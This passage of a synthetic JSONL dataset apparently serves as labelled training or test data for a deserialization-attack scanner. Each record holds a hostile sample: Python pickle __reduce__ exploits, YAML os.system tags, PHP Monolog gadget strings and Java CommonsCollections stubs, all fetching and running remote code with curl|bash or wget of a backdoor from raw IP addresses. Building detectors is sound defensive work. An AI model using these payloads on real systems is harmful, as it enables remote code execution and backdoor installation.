http://46.208.220.243/shell\")"}}]} {"id": "synth_malicious_deserialization_00211", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:21:\"PUXwmD3yqtvP2H4f2RQWZLot6uJ6zOTNERRd2Gij\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://161.91.42.84/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:21:\"PUXwmD3yqtvP2H4f2RQWZLot6uJ6zOTNERRd2Gij\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://161.91.42.84/bd\")"}}]} {"id": "synth_malicious_deserialization_00212", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('x+tfEtGdwYMcvK4A9N9Ltzb6K91TjirDkK3fkoF23F2SSBimcUON5caeSB8u')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://139.82.4.70/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('x+tfEtGdwYMcvK4A9N9Ltzb6K91TjirDkK3fkoF23F2SSBimcUON5caeSB8u')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00213", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://13.173.158.102/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://251.164.70.25/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://13.173.158.102/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://251.164.70.25/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00214", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:33:\"nFyasaRflqxe1qGRvL2GHykHkfaQVsfcvI/DkrL3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://140.125.43.223/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:33:\"nFyasaRflqxe1qGRvL2GHykHkfaQVsfcvI/DkrL3\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://140.125.43.223/bd\")"}}]} {"id": "synth_malicious_deserialization_00215", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('7e5jDfqVSG/dhuPi6wXAWAgoFhlsdjET5vfrQLzXxo+j+T13BdTyUIEN2XDs')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://58.212.249.41/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('7e5jDfqVSG/dhuPi6wXAWAgoFhlsdjET5vfrQLzXxo+j+T13BdTyUIEN2XDs')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00216", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://53.131.186.122/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://16.214.255.130/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://53.131.186.122/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://16.214.255.130/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00217", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:37:\"6KCYdQGhXP1kWAqDy3dI3Anbv5h0N9U/NLRWCqYJ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://144.86.238.195/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:37:\"6KCYdQGhXP1kWAqDy3dI3Anbv5h0N9U/NLRWCqYJ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://144.86.238.195/bd\")"}}]} {"id": "synth_malicious_deserialization_00218", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://198.200.109.219/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections3\n// Payload: Runtime.exec(\"curl http://198.200.109.219/shell\")"}}]} {"id": "synth_malicious_deserialization_00219", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:75:\"o6euy99pCwhstufXMG+s3FZ1RgnWBdQyNzBDuzUo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://103.164.146.169/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:75:\"o6euy99pCwhstufXMG+s3FZ1RgnWBdQyNzBDuzUo\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://103.164.146.169/bd\")"}}]} {"id": "synth_malicious_deserialization_00220", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('odbEw6ZdEd/dfyTmeIzGiXvqDcIipTraT5r92NsFSHYI9rprMyx33WDC+k68')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://193.76.248.99/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('odbEw6ZdEd/dfyTmeIzGiXvqDcIipTraT5r92NsFSHYI9rprMyx33WDC+k68')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00221", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://60.179.3.195/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://60.179.3.195/shell\")"}}]} {"id": "synth_malicious_deserialization_00222", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:47:\"MikcVCV3gH2hrwOD3vttRMJ5RY2aJ8JlKUllMJBc\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://72.227.177.29/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:47:\"MikcVCV3gH2hrwOD3vttRMJ5RY2aJ8JlKUllMJBc\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://72.227.177.29/bd\")"}}]} {"id": "synth_malicious_deserialization_00223", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nimport pickle, base64\ndata = base64.b64decode('OSmUXSzt73Nv1V7ANT0fxOjj43xbxy67eCjjHoqR3gyhNsh0evqIfjSqtYIH')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://48.56.254.118/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('OSmUXSzt73Nv1V7ANT0fxOjj43xbxy67eCjjHoqR3gyhNsh0evqIfjSqtYIH')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00224", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:62:\"V7LH8B1z3uRAy9nX538369YRPJ/N3C1aGFuPsJEn\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://39.101.58.234/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:62:\"V7LH8B1z3uRAy9nX538369YRPJ/N3C1aGFuPsJEn\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://39.101.58.234/bd\")"}}]} {"id": "synth_malicious_deserialization_00225", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:40:\"+u9QvWCubddBRFilRMtdZIfie2qGOMcLmgtiONTz\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://9.163.171.237/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:40:\"+u9QvWCubddBRFilRMtdZIfie2qGOMcLmgtiONTz\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://9.163.171.237/bd\")"}}]} {"id": "synth_malicious_deserialization_00226", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('7ITsEv6hE0zIuXE1ERgQ0SbZ0/SenWpGtFnx67ON1fQKutDwYbTZyDNS4DL8')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://195.4.152.63/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('7ITsEv6hE0zIuXE1ERgQ0SbZ0/SenWpGtFnx67ON1fQKutDwYbTZyDNS4DL8')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00227", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:71:\"tSleNzd5amRNqm9ZrZjb3tfTFCaoTuLlcb50TQRe\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://161.249.97.172/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:71:\"tSleNzd5amRNqm9ZrZjb3tfTFCaoTuLlcb50TQRe\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://161.249.97.172/bd\")"}}]} {"id": "synth_malicious_deserialization_00228", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('GvjvPluV2emfacEDgqop48wI2mzkPG4D3fWdUQDV8jVW74a/FKJAcVjy1GoJ')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://224.230.26.96/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('GvjvPluV2emfacEDgqop48wI2mzkPG4D3fWdUQDV8jVW74a/FKJAcVjy1GoJ')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00229", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://165.114.115.251/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://165.114.115.251/shell\")"}}]} {"id": "synth_malicious_deserialization_00230", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('hzhHdgCvq/iZMfQFF6OR7F4v/dfIP4HUIQdEcCdK5vqEec/EBH/gR5RlW2Io')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://165.136.11.128/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('hzhHdgCvq/iZMfQFF6OR7F4v/dfIP4HUIQdEcCdK5vqEec/EBH/gR5RlW2Io')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00231", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://61.117.67.110/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections6\n// Payload: Runtime.exec(\"curl http://61.117.67.110/shell\")"}}]} {"id": "synth_malicious_deserialization_00232", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://217.243.211.164/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections4\n// Payload: Runtime.exec(\"curl http://217.243.211.164/shell\")"}}]} {"id": "synth_malicious_deserialization_00233", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nO:8:\"Exploit\":1:{s:4:\"data\";s:29:\"5Tu4h3K1mhiwOA0scPv27EzL9zMrrBm0/96Eea6Y\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://7.13.84.45/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:29:\"5Tu4h3K1mhiwOA0scPv27EzL9zMrrBm0/96Eea6Y\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://7.13.84.45/bd\")"}}]} {"id": "synth_malicious_deserialization_00234", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:39:\"3TNE8rA6o1xZBHhCnmBISy1u7rUEFS0jxskGNsnJ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://218.12.3.219/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:39:\"3TNE8rA6o1xZBHhCnmBISy1u7rUEFS0jxskGNsnJ\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE2\n// Target: system(\"id && wget http://218.12.3.219/bd\")"}}]} {"id": "synth_malicious_deserialization_00235", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:46:\"RZv12O5S8txi0ar1oyin2tBQ1089Xo73bfUgk+8f\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://247.44.138.56/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:46:\"RZv12O5S8txi0ar1oyin2tBQ1089Xo73bfUgk+8f\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://247.44.138.56/bd\")"}}]} {"id": "synth_malicious_deserialization_00236", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:50:\"V8N5gs4fOVjndADcEVEyeJyXf/IBwPL2K4i2K4HH\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://33.223.113.126/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:50:\"V8N5gs4fOVjndADcEVEyeJyXf/IBwPL2K4i2K4HH\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://33.223.113.126/bd\")"}}]} {"id": "synth_malicious_deserialization_00237", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://4.214.210.156/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA==\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://4.214.210.156/shell\")"}}]} {"id": "synth_malicious_deserialization_00238", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:54:\"6IWjz1rCVMJU9ZIxfbd0Md3y+5WUuRfxHaJ4pcyz\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://205.4.159.38/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:54:\"6IWjz1rCVMJU9ZIxfbd0Md3y+5WUuRfxHaJ4pcyz\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://205.4.159.38/bd\")"}}]} {"id": "synth_malicious_deserialization_00239", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('S+G/PJ9VMFCfigzLh/F263HGh/EaQ3i1VrLM39ocbKfgt5mQG2VuNbneCAJP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://160.31.187.24/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('S+G/PJ9VMFCfigzLh/F263HGh/EaQ3i1VrLM39ocbKfgt5mQG2VuNbneCAJP')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00240", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:33:\"laIEKOe/4NN8KfbxER2GtKdTr5HKrxi3QKqQHMA1\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://162.190.204.82/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:33:\"laIEKOe/4NN8KfbxER2GtKdTr5HKrxi3QKqQHMA1\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://162.190.204.82/bd\")"}}]} {"id": "synth_malicious_deserialization_00241", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:70:\"EwY9VbrQ+uEwRO2moQESBk8ZgLySaWvxz7M06uAD\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://90.222.136.23/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:70:\"EwY9VbrQ+uEwRO2moQESBk8ZgLySaWvxz7M06uAD\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://90.222.136.23/bd\")"}}]} {"id": "synth_malicious_deserialization_00242", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://31.11.72.127/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections2\n// Payload: Runtime.exec(\"curl http://31.11.72.127/shell\")"}}]} {"id": "synth_malicious_deserialization_00243", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\nimport pickle, base64\ndata = base64.b64decode('Z7lwmkvgCe9ur4V7JNRdn07SwG91fxTJovCoa588XC8v6s52kddXVpa1TVu4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://129.128.157.72/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Z7lwmkvgCe9ur4V7JNRdn07SwG91fxTJovCoa588XC8v6s52kddXVpa1TVu4')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00244", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://88.54.200.2/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://55.110.139.230/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://88.54.200.2/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://55.110.139.230/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00245", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://135.13.241.56/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA=\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections7\n// Payload: Runtime.exec(\"curl http://135.13.241.56/shell\")"}}]} {"id": "synth_malicious_deserialization_00246", "source": "synthetic", "source_license": "generated", "text": "# Found in uploaded file\nO:8:\"Exploit\":1:{s:4:\"data\";s:24:\"8jw3dhUKBC0ijL75zprbC2KdkU1tacXwQNPeSwR7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://97.131.195.220/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:24:\"8jw3dhUKBC0ijL75zprbC2KdkU1tacXwQNPeSwR7\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE3\n// Target: system(\"id && wget http://97.131.195.220/bd\")"}}]} {"id": "synth_malicious_deserialization_00247", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nO:8:\"Exploit\":1:{s:4:\"data\";s:72:\"maVuOKTdMGXn1G7WdUAFpcniR0TerIEMP96mftqb\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://153.144.219.249/bd\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "php", "payload": "O:8:\"Exploit\":1:{s:4:\"data\";s:72:\"maVuOKTdMGXn1G7WdUAFpcniR0TerIEMP96mftqb\";}\n// PHP unserialize() payload\n// Chain: Monolog/RCE1\n// Target: system(\"id && wget http://153.144.219.249/bd\")"}}]} {"id": "synth_malicious_deserialization_00248", "source": "synthetic", "source_license": "generated", "text": "POST /api/import HTTP/1.1\nContent-Type: application/octet-stream\n\n!!python/object/apply:os.system\nargs: ['curl http://224.90.215.19/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://131.64.1.172/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://224.90.215.19/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://131.64.1.172/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00249", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nimport pickle, base64\ndata = base64.b64decode('Je6c9MvsRrKG3LkIQKwamGRvo3HSi7HIEvqntC/ov1CduOUZhLP+RSUNh5Qk')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n return (os.system, ('curl http://124.198.199.244/shell.sh | bash',))", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "pickle", "payload": "import pickle, base64\ndata = base64.b64decode('Je6c9MvsRrKG3LkIQKwamGRvo3HSi7HIEvqntC/ov1CduOUZhLP+RSUNh5Qk')\n# Malicious pickle payload\nclass Exploit:\n def __reduce__(self):\n import os\n "}}]} {"id": "synth_malicious_deserialization_00250", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\n!!python/object/apply:os.system\nargs: ['curl http://241.149.113.82/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://92.214.58.203/backdoor', '-O', '/tmp/bd']", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "yaml", "payload": "!!python/object/apply:os.system\nargs: ['curl http://241.149.113.82/payload | bash']\n---\n!!python/object/new:subprocess.Popen\n- ['wget', 'http://92.214.58.203/backdoor', '-O', '/tmp/bd']"}}]} {"id": "synth_malicious_deserialization_00251", "source": "synthetic", "source_license": "generated", "text": "# Cache file contents\nrO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://10.238.46.38/shell\")", "findings": [{"category": "malicious", "subcategory": "malicious.deserialization", "severity": "critical", "compliance": [], "fields": {"format": "java", "payload": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA===\n// Deserialized via ObjectInputStream\n// Gadget chain: CommonsCollections1\n// Payload: Runtime.exec(\"curl http://10.238.46.38/shell\")"}}]} {"id": "synth_malicious_deserialization_00252", 